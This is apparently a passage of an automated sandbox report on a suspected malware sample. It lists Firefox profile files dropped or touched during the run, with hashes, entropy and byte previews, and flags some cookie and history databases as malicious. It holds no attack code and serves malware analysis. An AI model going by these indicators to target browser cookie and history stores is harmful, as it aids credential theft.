SHA-512:	DAED6556D6AA370295B6CC43E9FB2CEC7D4DEDB4BE6837A4AAB4E4F4273AFDC5CFFBF5455286CE2D22FA36760103C85E3028A4EC542ED58014F58613A1C7128A
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db-journal

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	229944
Entropy (8bit):	0.8148223017985771
Encrypted:	false
SSDEEP:	384:7xuf5jkX1MMTNlH333JqN8j/LKX6bb1zkVmvQhyn+Zoz67n:ikFM0sCy+bi
MD5:	029B02160AA1C71C7DA31B9D22C2153B
SHA1:	3BA5233AF48A0A2F71259BEDEC650E32B7B69E27
SHA-256:	82B252DDEBDAF245B7BDD83911E4EA417B74C441B2B81DF48F971A6A4E5B25DF
SHA-512:	62479179235F771C8BBC90B63F37F6FC9B21E58F669570E35017683F5363B3837C0F271A55DCDF6C9E053C75702F36F884EC7ED14593D4CDD1A69FEFC645E49F
Malicious:	false
Preview:	.... .c.......X...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................9..R.9...k....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite 3.x database, user version 5, last written using SQLite version 3042000, page size 32768, file counter 4, database pages 8, cookie 0x6, schema 4, largest root page 8, UTF-8, vacuum mode 1, version-valid-for 4
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	0.04905141882491872
Encrypted:	false
SSDEEP:	24:DLSvwae+Q8Uu50xj0aWe9LxYkKA25Q5tvAA:DKwae+QtMImelekKDa5
MD5:	8736A542C5564A922C47B19D9CC5E0F2
SHA1:	CE9D58967DA9B5356D6C1D8A482F9CE74DA9097A
SHA-256:	97CE5D8AFBB0AA610219C4FAC3927E32C91BFFD9FD971AF68C718E7B27E40077
SHA-512:	99777325893DC7A95FD49B2DA18D32D65F97CC7A8E482D78EDC32F63245457FA5A52750800C074D552D20B6A215604161FDC88763D93C76A8703470C3064196B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......\|....~.}.}z}-\|.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	524288
Entropy (8bit):	0.044904225024857164
Encrypted:	false
SSDEEP:	48:DQV9rhvWTiwGUg2XoZoPBnAAbqbtO0UoGU/v:DQVhxabvPBAAbqBGU/v
MD5:	12C522D1F30B6E24C3181D448F9F52C3
SHA1:	F1E738BC160954F7A38CF685F85AE1F6ABE071C1
SHA-256:	E1C0B03546DD647A281C7DD270C5F2D51464028301A683E2CE6A495E2A835930
SHA-512:	FCF247AEFD0B240004A2FFE673024FB1244B05117A464F1CC5A7657DA7A13C3DE44ED2B68F7540E24E4D08B3AE24B2D16AF7A0BC0322A3B2D6BE81E7D9DE69E6
Malicious:	true
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.04227263218088591
Encrypted:	false
SSDEEP:	3:GAll8O++saBi9g6All8O++saBi9gvaa9//9lklklklZlilll/lBljltl/:GAlCvTaBi9g6AlCvTaBi9gZ9XYlilX
MD5:	F95D60D4ABFC1F87BEFDD8C9E7C3CFBE
SHA1:	0D3BCDEC8C67048C49C29A21B6E811D4E057DAA4
SHA-256:	D2A760EB7C73147D3FA06461BA8F3BEE2EFED2F7E9E97C6E965BD5D678CF9FB6
SHA-512:	F78829E7A034F11BCCE2DC879AB1568CE839A9ED07C1D422742522526EADA94D2CA4A224360466739A508DE6249DD15A1F904EFA0B9EFF491D5A1C20D42DF921
Malicious:	true
Preview:	..-......................".9.o..`..O..u.VrJMt...-......................".9.o..`..O..u.VrJMt.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	524704
Entropy (8bit):	0.18255654992610978
Encrypted:	false
SSDEEP:	96:AbsPBAAAqIGGU/vKsb3PBAAXqBGU/vQPBAAInGU/v/PBAAaqqGU/vW/bsPBAAdqC:Q9NWLOGLiW9NusLU9NYLB
MD5:	6E13B3C0BD6CBA37C6F1259A67F0ECA1
SHA1:	4C3BDD21C06B82AE1280A9B1AC1085FC0BD20393
SHA-256:	AE4901ACB81508656AEA0394B1986F21893061EF7DB4DDD957A7B7165276F57D
SHA-512:	6D373C87E14612699FB33EF3DA61AA96EFF04138F61128957F9A8B96A4A31F7714E3E689B6373183BA4B9FE2D3F7D9B510C5CBA88FBFD3540710ACA327FA916B
Malicious:	true
Preview:	7....-...........`..O..uXPd..o...........`..O..u{Z4.6.\..~...}]....w..}.}]~.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\extension-preferences.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.602783968965045
Encrypted:	false
SSDEEP:	24:Y5FKFPVKFPFKFdlgKFVfKFQ/SKFNkmKFHmKFdh9cmKFJmKFsmKFcmKFV:Y8pdw8
MD5:	9EE6331D8E67E8AE6D709B4BD25182C5
SHA1:	4E2163D232F5CA9420EDD73E56B57D12C3EEEAC3
SHA-256:	D4E524B0CDE857D485239F5B91AC248E4456BFE51EB14D410980AA42FFD929F2
SHA-512:	042FD6BA8BC82B99CD6750140107078A3E48DD5539F8CCE4398CA3FD28886C9846421E19188C99E57225961F6AE7163A68C7B4C02D0E511131FB10ADC2D85FA3
Malicious:	false
Preview:	{"formautofill@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"pictureinpicture@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"screenshots@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"webcompat@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"default-theme@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"addons-search-detection@mozilla.com":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"google@search.mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"amazondotcom@search.mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"wikipedia@search.mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"bing@search.mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"ddg@s

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\extension-preferences.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.602783968965045
Encrypted:	false
SSDEEP:	24:Y5FKFPVKFPFKFdlgKFVfKFQ/SKFNkmKFHmKFdh9cmKFJmKFsmKFcmKFV:Y8pdw8
MD5:	9EE6331D8E67E8AE6D709B4BD25182C5
SHA1:	4E2163D232F5CA9420EDD73E56B57D12C3EEEAC3
SHA-256:	D4E524B0CDE857D485239F5B91AC248E4456BFE51EB14D410980AA42FFD929F2
SHA-512:	042FD6BA8BC82B99CD6750140107078A3E48DD5539F8CCE4398CA3FD28886C9846421E19188C99E57225961F6AE7163A68C7B4C02D0E511131FB10ADC2D85FA3
Malicious:	false
Preview:	{"formautofill@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"pictureinpicture@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"screenshots@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"webcompat@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"default-theme@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"addons-search-detection@mozilla.com":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"google@search.mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"amazondotcom@search.mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"wikipedia@search.mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"bing@search.mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed"],"origins":[]},"ddg@s

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\extensions.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	39948
Entropy (8bit):	5.1525574841855875
Encrypted:	false
SSDEEP:	768:JI4avfWX94O6L4x4ME454N4ohvM4T4Pia4T4I4t54rR4y:JI4Kvd
MD5:	41205DE9BD3DA71AC59C6761172B0F2D
SHA1:	0656E5211360FA61C75DA458C1EC832A3AD84E3B
SHA-256:	04A1112B6CA3F6494AB4E4ABE1AF9B3F90AFA2E88AD96EC7BCE92845B0CCCCD0
SHA-512:	36D5C655D70162269A864633E61B63C9391CD193F00BE6CE29797CE8CAA86B24713F0392CB659238A6B636AB1CCCC9EBB31EEB5812B96109DC35EEBB3FA114C3
Malicious:	false
Preview:	{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{7a5650ac-9a89-4807-a040-9f0832bf39a9}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\extensions.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	39948
Entropy (8bit):	5.1525574841855875
Encrypted:	false
SSDEEP:	768:JI4avfWX94O6L4x4ME454N4ohvM4T4Pia4T4I4t54rR4y:JI4Kvd
MD5:	41205DE9BD3DA71AC59C6761172B0F2D
SHA1:	0656E5211360FA61C75DA458C1EC832A3AD84E3B
SHA-256:	04A1112B6CA3F6494AB4E4ABE1AF9B3F90AFA2E88AD96EC7BCE92845B0CCCCD0
SHA-512:	36D5C655D70162269A864633E61B63C9391CD193F00BE6CE29797CE8CAA86B24713F0392CB659238A6B636AB1CCCC9EBB31EEB5812B96109DC35EEBB3FA114C3
Malicious:	false
Preview:	{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{7a5650ac-9a89-4807-a040-9f0832bf39a9}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite-shm

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.03755349143203272
Encrypted:	false
SSDEEP:	3:GHln/Z1TcL0uYNIdln/Z1TcL0uYXMR9//zll9lfl:G9DgYdYDgYHMR9Xzl
MD5:	CFD3276D7012ADE92432745A661347A8
SHA1:	0A3B220AC57CCFD620371A9B73E7F463D23BADEA
SHA-256:	D98B0452C8526ED99BBA21160F27875E0D7A87E6E2D023F9FAF0A6733D3091A0
SHA-512:	49555C06570B37B9DF9D4FAFAF310886F0C86DAFDCD13EC36D0FFA22AF50A0B5ACE7D6CC6D894E8913F9B42CFC3C831DF543FE65A541F14C2173E9F958369F93
Malicious:	false
Preview:	..-........................}Z.6d......%..4-=8...-........................}Z.6d......%..4-=8.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite-wal

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	98408
Entropy (8bit):	3.868720766755284
Encrypted:	false
SSDEEP:	768:bglzrotQtn2SsbJUZzzZzGZzMglzrotQtn2SsbJUZzzZzGZzT:yrotQt2SsVUxE7rotQt2SsVUxEZ
MD5:	B9B5E15DB924F54ABC07D5FF2DA12663
SHA1:	A0C2E0907F4E6C5877E89D3C3E07FA1DB1737F7B
SHA-256:	433485009D60E6E4BC96725A2AAC8158F4E8F63CC930720B69032FCC5EF4CF4C
SHA-512:	59B959119232EF7E34F22E5E14DEF6830D82E08B392E77932F89085AC4081506E79EA88FE0791ACFCC0B15C0F4F4A21523416B28AD135DA4D32F10ECB10BC140
Malicious:	false
Preview:	7....-.................^..Z~................p;...Vw......8&.x.o.m.kpc%K.F.C.@.>.8&..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, file counter 5, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.07387195583313987
Encrypted:	false
SSDEEP:	12:DBl/WP7Wla0mwPxRymgObsCVR45wcYR4fmnsCVR4WguGBgV9:DL+dsh7Owd4+FABQ
MD5:	CEE97AC7DF2D5209BBA07D502FB7CE2F
SHA1:	633FEA84FDE33831B22199657A86E2654BEA2694
SHA-256:	13F508DE3929740065650B6CC0EA5D7490482FD1D1AF441D80EDE5AD091F049B
SHA-512:	5BF73BE333A2E5415786C0617FBB586796FE76602DB7CAE30118F6496C44032B968CE88A25299FCAFE2C916A97F0FCC857AE7BF4A17E5EC0C8E1A9A81CDB166B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......~s..F~s........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.045267855053290645
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWl6eNNzfkatQDSjkDyZ5aM3dFKXwAyQI:58r54w0VW3xW8eNlvtMkkDEAM3e/y
MD5:	2D6F5CBD49CA8E11F474EA8D54256AF5
SHA1:	95802390F38E0FE697CDC24E689B2EB82964620A
SHA-256:	8C714DCE12A839AE52ABA9885BED8603DBA35800F8C2024BFD53E842F9BA2577
SHA-512:	AEA367817DAB4FC69645D4E5470C7FB133D01FE0126E24EA3E8E966BBB0A85DDB33F2ADFCE8C6B6A17608A466075088E0E9E3974F62805AD38C7E77EC46F46C2
Malicious:	true
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07344257960223396
Encrypted:	false
SSDEEP:	6:Gh8taE0pbtXOeJ8taE0pbtXOeA9XBl/ql/tFl/Ocl/tFl/Ocl/2Al7MlXWlwlMli:1taPtstaPt+Bl/ePl/hPl/heUkbMG6
MD5:	8D30174744B991EEA0B279D58DCDDD31
SHA1:	72BEFB7DCCA26AF50582B3FE370DE287E146224B
SHA-256:	8BFB34B0C10F72E4612B9B54D49C8BB18927EC245BC8B895594890E70334AC86
SHA-512:	B5D830D43688265A664A6140FB40B118396B577AA1CA2EEC159F30FC478FE330B16319BEE0E6622FCC1D70C59580FDA3D04A85DEE25D21919CF1822E3BED1E15
Malicious:	true
Preview:	..-.............+........p.............S^.9.;.3L..-.............+........p.............S^.9.;.3L........*.......................................................................'...........................................................'...........................................................'...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	2295472
Entropy (8bit):	0.21304127230923686
Encrypted:	false
SSDEEP:	1536:HONDdCBbcg+LBmpfrk0q3IWCYUYcNp6Jn77yjwexpPfIe4ell1uW5ocQrQeK48Ll:wIlEqILAl
MD5:	A61AD774687EBC48FA447AF0CB9D669D
SHA1:	7F42CDC37B5F330A3EE559E12FBA7914FCBDDDA1
SHA-256:	20CE29BF8B85A097E81E61ED8818F4587F6BFDBC49D183DB3707778354DA1DDE
SHA-512:	6F9D9E9FADEC8487CECE53E957624A7F9462080FCD61298CF8D06D92C5BF926A5DB8243633676F6901AC95311CC72D8627E2B32AC905E88E71F807EC50715054
Malicious:	true
Preview:	7....-.................S...$...................S......5..o...'......M.'................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (4623), with CRLF line terminators
Category:	dropped
Size (bytes):	15844
Entropy (8bit):	5.724328134651813
Encrypted:	false
SSDEEP:	192:XnPOeRnLg3bBp6hHkTdh60ZpndzmjSASZaXsO6SEXKANLc5RHWNBw8deSl:/DScbSbVlQHEwz0
MD5:	2B2EA3BF36C73DC423F51F879D0ED679
SHA1:	01C4315D7708081A64F60210D000760362C28232
SHA-256:	7CEA5EC997CA64C1780021CF24D465FD298789F577521750707AD733C4EDF75C
SHA-512:	DE190EE6FE8A32CEAA0ABB05027BC8D77E980716BB6FFFE1FE3F676188997180678650C41B85923CA861741D284FA847803F0DDCC6FACA9D901E1F29D80EE77E
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1722022036);..user_pref("app.update.lastUpdateTime.background-update-timer", 1722022036);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-upd

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (4623), with CRLF line terminators
Category:	dropped
Size (bytes):	15844
Entropy (8bit):	5.724328134651813
Encrypted:	false
SSDEEP:	192:XnPOeRnLg3bBp6hHkTdh60ZpndzmjSASZaXsO6SEXKANLc5RHWNBw8deSl:/DScbSbVlQHEwz0
MD5:	2B2EA3BF36C73DC423F51F879D0ED679
SHA1:	01C4315D7708081A64F60210D000760362C28232
SHA-256:	7CEA5EC997CA64C1780021CF24D465FD298789F577521750707AD733C4EDF75C
SHA-512:	DE190EE6FE8A32CEAA0ABB05027BC8D77E980716BB6FFFE1FE3F676188997180678650C41B85923CA861741D284FA847803F0DDCC6FACA9D901E1F29D80EE77E
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1722022036);..user_pref("app.update.lastUpdateTime.background-update-timer", 1722022036);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-upd

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite 3.x database, user version 1, last written using SQLite version 3042000, page size 32768, file counter 4, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.04062825861060003
Encrypted:	false
SSDEEP:	3:lSGBl/l/zl9l/AltllPltlnKollzvulJOlzALRWemFxu7TuRjBFbrl58lcV+wgn8:ltBl/lqN1K4BEJYqWvLue3FMOrMZ0l
MD5:	60C09456D6362C6FBED48C69AA342C3C
SHA1:	58B6E22DAA48C75958B429F662DEC1C011AE74D3
SHA-256:	FE1A432A2CD096B7EEA870D46D07F5197E34B4D10666E6E1C357FAA3F2FE2389
SHA-512:	936DBC887276EF07732783B50EAFE450A8598B0492B8F6C838B337EF3E8A6EA595E7C7A2FA4B3E881887FAAE2D207B953A4C65ED8C964D93118E00D3E03882BD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......x..x..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\search.json.mozlz4 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Mozilla lz4 compressed data, originally 787 bytes
Category:	dropped
Size (bytes):	365
Entropy (8bit):	5.6408245684778855
Encrypted:	false
SSDEEP:	6:vXASHkawihcfAhiilP7521LriLb78bPUAu9uVR1VfWcK5HdEv2X8WM/Iw2pS+mP9:vASHkawuhbPWi78TUH9GzV+lHdE+c/D/
MD5:	693D182DC2FCFA35447D2714ADE7F5A3
SHA1:	22522D21FC377CC3B37CDBDAC9552C03CE1E5D22
SHA-256:	52D21B3BB8DDD1827F37A078897ACDA3724C962F67AD06FB44D909BC95D3B6E4
SHA-512:	75FFF437A2747DABD285D950A866F3FFA52C6E44E5991DB4A191854AB6B8B255E8CEBE64DF6571280ABEC53ED7B262970A4F61635DE37CCFA7D01913BC52586F
Malicious:	false
Preview:	mozLz40......<{"version":9,"engines":[{"id":"google@search.mozilla.orgdefault","_name":"G+......isAppProvided":true,"_metaData":{}},`..amazondotcomf...A1.O.comj...wikipediag...W.._ (en)k..Obingf..OBing\../dd[..@Duck../Goa..Oebay...OeBay\..7],"...."useSavedOrder":false,"localI..en-US","reg..."....channel":"release","experiment":"","distroID..BappD...E...I...Plt"}}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\search.json.mozlz4.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Mozilla lz4 compressed data, originally 787 bytes
Category:	dropped
Size (bytes):	365
Entropy (8bit):	5.6408245684778855
Encrypted:	false
SSDEEP:	6:vXASHkawihcfAhiilP7521LriLb78bPUAu9uVR1VfWcK5HdEv2X8WM/Iw2pS+mP9:vASHkawuhbPWi78TUH9GzV+lHdE+c/D/
MD5:	693D182DC2FCFA35447D2714ADE7F5A3
SHA1:	22522D21FC377CC3B37CDBDAC9552C03CE1E5D22
SHA-256:	52D21B3BB8DDD1827F37A078897ACDA3724C962F67AD06FB44D909BC95D3B6E4
SHA-512:	75FFF437A2747DABD285D950A866F3FFA52C6E44E5991DB4A191854AB6B8B255E8CEBE64DF6571280ABEC53ED7B262970A4F61635DE37CCFA7D01913BC52586F
Malicious:	false
Preview:	mozLz40......<{"version":9,"engines":[{"id":"google@search.mozilla.orgdefault","_name":"G+......isAppProvided":true,"_metaData":{}},`..amazondotcomf...A1.O.comj...wikipediag...W.._ (en)k..Obingf..OBing\../dd[..@Duck../Goa..Oebay...OeBay\..7],"...."useSavedOrder":false,"localI..en-US","reg..."....channel":"release","experiment":"","distroID..BappD...E...I...Plt"}}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\recovery.baklz4 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Mozilla lz4 compressed data, originally 15819 bytes
Category:	dropped
Size (bytes):	5904
